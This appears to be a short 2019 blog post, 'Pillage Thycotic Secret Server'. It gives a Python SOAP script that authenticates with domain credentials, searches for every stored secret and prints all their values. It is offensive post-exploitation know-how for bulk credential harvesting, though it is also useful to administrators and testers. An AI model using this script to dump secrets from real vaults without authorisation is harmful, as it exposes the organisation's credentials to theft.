#!/usr/bin/env python3 from zeep import Client #Connect to the soap api endpoint client = Client("https://secretserver.example.com/SecretServer/webservices/SSWebservice.asmx?wsdl") #grab your auth token for all your requests token = client.service.Authenticate("user_here", "pass_here", "", "domain_here") #grab all secrets for the user searchSecret = client.service.SearchSecrets(token.Token, "*") #output the secret values for each secret for secret in searchSecret.SecretSummaries.SecretSummary: print(client.service.GetSecret(token.Token, secret['SecretId']))
Thursday, December 12, 2019
Pillage Thycotic Secret Server
If you want to grab all the secrets from Thycotic's secret server, use the SOAP API to pull them out. Assuming you have valid domain creds, run the following script.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment